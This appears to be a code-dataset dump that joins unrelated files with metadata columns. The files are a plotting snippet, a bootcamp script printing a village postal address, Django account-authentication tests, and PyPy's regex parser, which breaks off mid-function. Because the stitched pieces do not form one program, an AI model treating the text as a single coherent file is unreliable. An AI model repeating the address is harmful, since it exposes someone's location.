plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_NTA.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_NTA.pdf')
| 25.72619
| 106
| 0.641832
| 1,305
| 6,483
| 2.922605
| 0.111877
| 0.024646
| 0.037756
| 0.012585
| 0.907708
| 0.898532
| 0.891453
| 0.891453
| 0.891453
| 0.856843
| 0
| 0.067937
| 0.182632
| 6,483
| 252
| 107
| 25.72619
| 0.651821
| 0.045349
| 0
| 0.860335
| 0
| 0
| 0.099498
| 0.046346
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03352
| 0
| 0.03352
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0eba4221dffaf7a551a55fe9039a2ff394a5f1fa
| 110
|
py
|
Python
|
ROHIT KUMAR/address.py
|
asumit499/Python-BootCamp
|
0b99f9cb862189d13ad291eac12a8be6c46357f5
|
[
"MIT"
] | 4
|
2022-03-20T10:59:53.000Z
|
2022-03-25T18:28:04.000Z
|
ROHIT KUMAR/address.py
|
asumit499/Python-BootCamp
|
0b99f9cb862189d13ad291eac12a8be6c46357f5
|
[
"MIT"
] | null | null | null |
ROHIT KUMAR/address.py
|
asumit499/Python-BootCamp
|
0b99f9cb862189d13ad291eac12a8be6c46357f5
|
[
"MIT"
] | 15
|
2022-03-12T11:49:10.000Z
|
2022-03-15T06:22:55.000Z
|
print("address\nvillage=rajwada\npost office =rajwada\npolice station=sonbarsa\ndist.=sitamarhi\npin=843330")
| 55
| 109
| 0.827273
| 14
| 110
| 6.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 0.036364
| 110
| 1
| 110
| 110
| 0.801887
| 0
| 0
| 0
| 0
| 1
| 0.909091
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
0ef3c7f60ac42a3fafe796541cf8caf0b0dfa70b
| 18,117
|
py
|
Python
|
typingtester/accounts/tests.py
|
AmirMohammad2003/TypingWebsite
|
4f45e88dfdd35666c0028fc53d22197014505226
|
[
"MIT"
] | 2
|
2022-01-23T10:04:19.000Z
|
2022-01-23T10:21:45.000Z
|
typingtester/accounts/tests.py
|
AmirMohammad2003/TypingWebsite
|
4f45e88dfdd35666c0028fc53d22197014505226
|
[
"MIT"
] | null | null | null |
typingtester/accounts/tests.py
|
AmirMohammad2003/TypingWebsite
|
4f45e88dfdd35666c0028fc53d22197014505226
|
[
"MIT"
] | null | null | null |
"""accounts.tests
Test Cases Defined for Accounts Application
"""
import json
from django.core import mail
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.utils.http import urlsafe_base64_encode
class LoginAndLogoutTestCases(TestCase):
"""Login and Logout Test Cases"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
def test_login(self):
"""
Test Login if the user is active and his/her email is verified
and the credentials are valid
"""
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
response = self.client.post(
'/auth/login/',
{'username': 'test', 'password': 'test'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(_res['username'], 'test')
def test_login_wrong_password(self):
"""Test Login with wrong password"""
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test1'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_login_inactive_user(self):
"""test login if the user is inactive"""
self.user.is_active = False
self.user.is_email_verified = True
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_login_not_verified_email(self):
"""test login if the user's email is not verified"""
self.user.is_active = True
self.user.is_email_verified = False
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_logout(self):
"""Test Logout if the user is logged in"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/logout/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
def test_logout_not_logged_in(self):
"""Test Logout if the user is not logged in"""
self.client.logout()
response = self.client.post('/auth/logout/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class CheckIfAuthenticatedTestCases(TestCase):
"""
Test the CheckIfAuthenticated view
"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com')
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_check_if_authenticated_true(self):
"""Test if the user is authenticated"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_check_if_authenticated_false(self):
"""Test if the user is not authenticated"""
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'false')
class RegisterTestCases(TestCase):
"""Test cases for registering a new user"""
def setUp(self):
self.user_model = get_user_model()
def test_register_success(self):
"""Test a successful registration"""
response = self.client.post(
'/auth/register/',
{
'username': 'test', 'password1': 'testtesttest',
'password2': 'testtesttest', 'email': 'test@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'unknown')
self.assertEqual(len(mail.outbox), 1)
url = mail.outbox[0].message().as_string().split('\n')[-1]
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
self.client.post(
'/auth/login/', {'username': 'test', 'password': 'testtesttest'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_register_username_exists(self):
"""Test if the username already exists"""
self.user_model.objects.create_user(
username='test4', password='test', email='test4@test.com'
)
response = self.client.post(
'/auth/register/',
{
'username': 'test4', 'password1': 'test',
'password2': 'test', 'email': 'test4@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_email_exists(self):
"""Test if the email already exists"""
self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
response = self.client.post(
'/auth/register/',
{
'username': 'test3', 'password1': 'test',
'password2': 'test', 'email': 'test3@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_invalid_password(self):
"""Test if the password is invalid"""
response = self.client.post(
'/auth/register/',
{
'username': 'test5', 'password1': 'test',
'password2': 'test', 'email': 'test5@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_unverified_email_login(self):
"""Test if the user's email is not verified"""
response = self.client.post(
'/auth/register/',
{
'username': 'test2', 'password1': '0s5I6vjDCKeo',
'password2': '0s5I6vjDCKeo', 'email': 'test2@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'unknown')
self.assertEqual(len(mail.outbox), 1)
self.client.post(
'/auth/login/', {'username': 'test2', 'password': '0s5I6vjDCKeo'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'false')
class VerifyEmailTestCases(TestCase):
"""Test cases for verifying a user's email"""
def setUp(self):
self.user_model = get_user_model()
def test_verify_email_failure(self):
"""Test if the verification link is invalid"""
response = self.client.get(
'/auth/verify/asdf/adsfasdfasdfasdfasdfasdf/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class ForgotPasswordTestCases(TestCase):
"""Test cases for resetting a user's password"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
def test_forgot_password_success(self):
"""Test a successful password reset"""
response = self.client.post(
"/auth/reset/",
{'email': 'test@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 1)
url = mail.outbox[0].message().as_string().split('\n')[-1]
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
uidb64 = url.split('/')[-3]
token = url.split('/')[-2]
response = self.client.post(
'/auth/reset/confirm/',
{
'password1': 'testtesttest',
'password2': 'testtesttest',
'uidb64': uidb64,
'token': token
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.client.post(
'/auth/login/', {'username': 'test', 'password': 'testtesttest'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_forgot_password_failure(self):
"""Test a if the email address is invalid"""
response = self.client.post(
"/auth/reset/",
{'email': 'dummy@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 0)
def test_forgot_password_logged_in(self):
"""Test if the user is already logged in"""
self.user.is_email_verified = True
self.user.is_active = True
self.user.save()
self.client.post(
'/auth/login/', {'username': 'test',
'password': 'test'}
)
response = self.client.post(
"/auth/reset/",
{'email': 'test@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
self.assertContains(response, 'logged in')
def test_forgot_password_confirm_bad_token(self):
"""Test if the token or uidb64 is invalid"""
response = self.client.post(
'/auth/reset/confirm/',
{
'password1': 'testtesttest',
'password2': 'testtesttest',
'uidb64': 'asldkfj', # invalid data
'token': 'asldfjalskdfjalsjkdfl;a' # invalid data
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
class FetchUserInformationTestCase(TestCase):
"""Test cases for fetching user information"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_fetch_user_information_success(self):
"""Test if the user information is fetched successfully"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(_res['username'], 'test')
self.assertEqual(_res['email'], 'test@test.com')
def test_fetch_user_information_notloggedin(self):
"""Test if the user information is fetched successfully"""
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 401)
def test_fetch_user_information_notverified(self):
"""Test if the user information is fetched successfully"""
self.user.is_email_verified = False
self.user.save()
self.client.login(username='test', password='test')
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 403)
class ChangePasswordTestCases(TestCase):
"""Test cases for changing a user's password"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_change_password_success(self):
"""Test if the user's password is changed successfully"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
def test_change_password_failure(self):
"""Test if the user's password is not changed successfully
because of invalid old password"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test2', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_change_password_notloggedin(self):
"""Test if the user's password is not changed successfully
because of not being logged in"""
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 401)
def test_change_password_old_password_equal_new_password(self):
"""Test if the user's password is not changed successfully
because of old password is equal to new password"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'test',
'new_password2': 'test'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class ResendVerificationEmail(TestCase):
"""Test cases for resending verification email"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com')
def test_resend_verification_email_success(self):
"""Test if the verification email is sent successfully"""
session = self.client.session
session['_id'] = urlsafe_base64_encode(str(self.user.id).encode())
session.save()
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 1)
def test_resend_verification_email_no_session_id(self):
"""Test if the verification email is not sent successfully
because there is no session id"""
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
def test_resend_verification_email_logged_in(self):
"""Test if the verification email is not sent successfully
because the user is logged in"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
def test_resend_verification_email_already_verified(self):
"""Test if the verification email is not sent successfully
because the user is already verified"""
self.user.is_email_verified = True
self.user.save()
session = self.client.session
session['_id'] = urlsafe_base64_encode(str(self.user.id).encode())
session.save()
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
| 38.302326
| 78
| 0.610421
| 2,008
| 18,117
| 5.360558
| 0.080179
| 0.108696
| 0.046823
| 0.060201
| 0.831289
| 0.787904
| 0.77081
| 0.744705
| 0.726496
| 0.698439
| 0
| 0.013459
| 0.257714
| 18,117
| 472
| 79
| 38.383475
| 0.786957
| 0.106199
| 0
| 0.68232
| 0
| 0
| 0.142875
| 0.01621
| 0
| 0
| 0
| 0
| 0.218232
| 1
| 0.10221
| false
| 0.171271
| 0.013812
| 0
| 0.138122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0efa1cb084ddaf2c2a94721470d81904f8055037
| 76,176
|
py
|
Python
|
pypy/rlib/parsing/regexparse.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 1
|
2019-05-27T00:58:46.000Z
|
2019-05-27T00:58:46.000Z
|
pypy/rlib/parsing/regexparse.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/rlib/parsing/regexparse.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
import py
from pypy.rlib.parsing.parsing import PackratParser, Rule
from pypy.rlib.parsing.tree import Nonterminal
from pypy.rlib.parsing.regex import StringExpression, RangeExpression
from pypy.rlib.parsing.lexer import Lexer, DummyLexer
from pypy.rlib.parsing.deterministic import compress_char_set, DFA
import string
set = py.builtin.set
ESCAPES = {
"a": "\a",
"b": "\b",
"e": "\x1b",
"f": "\f",
"n": "\n",
"r": "\r",
"t": "\t",
"v": "\v",
}
for i in range(256):
# Add the ctrl-x types:
# Rule, according to PCRE:
# if x is a lower case letter, it is converted to upper case.
# Then bit 6 of the character (hex 40) is inverted.
# Thus, \cz => 0x1A, \c{ => 0x3B, \c; => 0x7B.
escaped = "c%s" % chr(i)
ESCAPES[escaped] = chr(ord(chr(i).upper()) ^ 0x40)
def unescape_muncher(string):
"""Return a tuple, representing the first character of the string
(appropriately unescaped) and the rest of the string that wasn't
handled."""
if string[0] != '\\':
# Not an escape character
return string[0], string[1:]
if string[1] == 'x':
# Hex char, must have two hex digits
char = chr(int(string[2:4], 16))
return char, string[4:]
if string[1] in '01234567':
# Octal number, up to three digits long
span = 2
span += (span < len(string)) and (string[span] in '01234567')
span += (span < len(string)) and (string[span] in '01234567')
char = chr(int(string[1:span], 8))
return char, string[span:]
if string[1] == 'c':
# Special \cx types
return ESCAPES['c'+string[2]], string[3:]
if string[1] in ESCAPES:
# Special escapes are in ESCAPE
return ESCAPES[string[1]], string[2:]
# Otherwise, it's just the character it's meant to be (e.g., '\.')
return string[1], string[2:]
def unescape(s):
"""Unescape a whole string."""
result = []
while s:
char, s = unescape_muncher(s)
result.append(char)
return "".join(result)
syntax = r"""
EOF:
!__any__;
parse:
regex
[EOF];
regex:
r1 = concatenation
'|'
r2 = regex
return {r1 | r2}
| concatenation;
concatenation:
l = repetition*
return {reduce(operator.add, l, regex.StringExpression(""))};
repetition:
r1 = primary
'*'
return {r1.kleene()}
| r1 = primary
'+'
return {r1 + r1.kleene()}
| r1 = primary
'?'
return {regex.StringExpression("") | r1}
| r1 = primary
'{'
n = clippednumrange
'}'
return {r1 * n + r1.kleene()}
| r1 = primary
'{'
n = numrange
'}'
return {r1 * n[0] + reduce(operator.or_, [r1 * i for i in range(n[1] - n[0] + 1)], regex.StringExpression(""))}
| '{'
return {regex.StringExpression("{")}
| primary;
primary:
['('] regex [')']
| range
| cc = charclass
return {reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(cc)])}
| c = char
return {regex.StringExpression(c)}
| '.'
return {regex.RangeExpression(chr(0), chr(255))}
| '-'
return {regex.StringExpression('-')}
| '\'
return {regex.StringExpression('\\')}
| ']'
return {regex.StringExpression(']')};
char:
c = QUOTEDCHAR
return {unescape(c)}
| c = CHAR
return {c};
QUOTEDCHAR:
`(\\x[0-9a-fA-F]{2})|(\\[0-3]?[0-7][0-7])|(\\c.)|(\\[^dswDSW])`;
CHAR:
`[^\*\+\(\)\[\]\{\|\.\-\?\^\\]`;
range:
'['
s = rangeinner
']'
return {reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(s)])};
rangeinner:
'^'
s = subrange
return {set([chr(c) for c in range(256)]) - s}
| subrange;
subrange:
']'
l = rangeelement*
return {reduce(operator.or_, [set(["]"])] + l)}
| l = rangeelement+
return {reduce(operator.or_, l)};
rangeelement:
charclass
| c1 = char
'-'
c2 = char
return {set([chr(i) for i in range(ord(c1), ord(c2) + 1)])}
| '.'
return { set(['.']) }
| '*'
return { set(['*']) }
| '+'
return { set(['+']) }
| '?'
return { set(['?']) }
| '-'
return { set(['-']) }
| '['
return { set(['[']) }
| c = char
return { set([c]) };
numrange:
n1 = NUM
','
n2 = NUM
return {n1, n2}
| n1 = NUM
return {n1, n1};
clippednumrange:
n1 = NUM
','
return {n1};
charclass:
'\' 'd'
return { set([chr(c) for c in range(ord('0'), ord('9')+1)]) }
| '\' 's'
return { set(['\t', '\n', '\f', '\r', ' ']) }
| '\' 'w'
return { set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']) }
| '\' 'D'
return { set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('0'), ord('9')+1)]) }
| '\' 'S'
return { set([chr(c) for c in range(256)]) - set(['\t', '\n', '\f', '\r', ' ']) }
| '\' 'W'
return { set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_'])};
NUM:
c = `0|([1-9][0-9]*)`
return {int(c)};
"""
def parse_regex(s):
p = RegexParser(s)
r = p.parse()
return r
def make_runner(regex, view=False):
r = parse_regex(regex)
nfa = r.make_automaton()
dfa = nfa.make_deterministic()
if view:
dfa.view()
dfa.optimize()
if view:
dfa.view()
r = dfa.get_runner()
return r
# generated code between this line and its other occurence
from pypy.rlib.parsing.pypackrat import PackratParser, Status
from pypy.rlib.parsing.pypackrat import BacktrackException
from pypy.rlib.parsing import regex
import operator
class Parser(object):
def EOF(self):
return self._EOF().result
def _EOF(self):
_key = self._pos
_status = self._dict_EOF.get(_key, None)
if _status is None:
_status = self._dict_EOF[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_choice0 = self._pos
_stored_result1 = _result
try:
_result = self.__any__()
except BacktrackException:
self._pos = _choice0
_result = _stored_result1
else:
raise BacktrackException(None)
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._EOF()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def parse(self):
return self._parse().result
def _parse(self):
_key = self._pos
_status = self._dict_parse.get(_key, None)
if _status is None:
_status = self._dict_parse[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_call_status = self._regex()
_result = _call_status.result
_error = _call_status.error
_before_discard0 = _result
_call_status = self._EOF()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_result = _before_discard0
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._parse()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def regex(self):
return self._regex().result
def _regex(self):
_key = self._pos
_status = self._dict_regex.get(_key, None)
if _status is None:
_status = self._dict_regex[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._concatenation()
_result = _call_status.result
_error = _call_status.error
r1 = _result
_result = self.__chars__('|')
_call_status = self._regex()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r2 = _result
_result = (r1 | r2)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._concatenation()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
raise BacktrackException(_error)
_call_status = self._concatenation()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
break
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._regex()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def concatenation(self):
return self._concatenation().result
def _concatenation(self):
_key = self._pos
_status = self._dict_concatenation.get(_key, None)
if _status is None:
_status = self._dict_concatenation[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_all0 = []
while 1:
_choice1 = self._pos
try:
_call_status = self._repetition()
_result = _call_status.result
_error = _call_status.error
_all0.append(_result)
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
break
_result = _all0
l = _result
_result = (reduce(operator.add, l, regex.StringExpression("")))
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._concatenation()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def repetition(self):
return self._repetition().result
def _repetition(self):
_key = self._pos
_status = self._dict_repetition.get(_key, None)
if _status is None:
_status = self._dict_repetition[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
while 1:
_choice0 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = _call_status.error
r1 = _result
_result = self.__chars__('*')
_result = (r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice0
_choice1 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('+')
_result = (r1 + r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice1
_choice2 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('?')
_result = (regex.StringExpression("") | r1)
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice2
_choice3 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('{')
_call_status = self._clippednumrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n = _result
_result = self.__chars__('}')
_result = (r1 * n + r1.kleene())
break
except BacktrackException, _exc:
_error = self._combine_errors(_error, _exc.error)
self._pos = _choice3
_choice4 = self._pos
try:
_call_status = self._primary()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
r1 = _result
_result = self.__chars__('{')
_call_status = self._numrange()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
n = _result
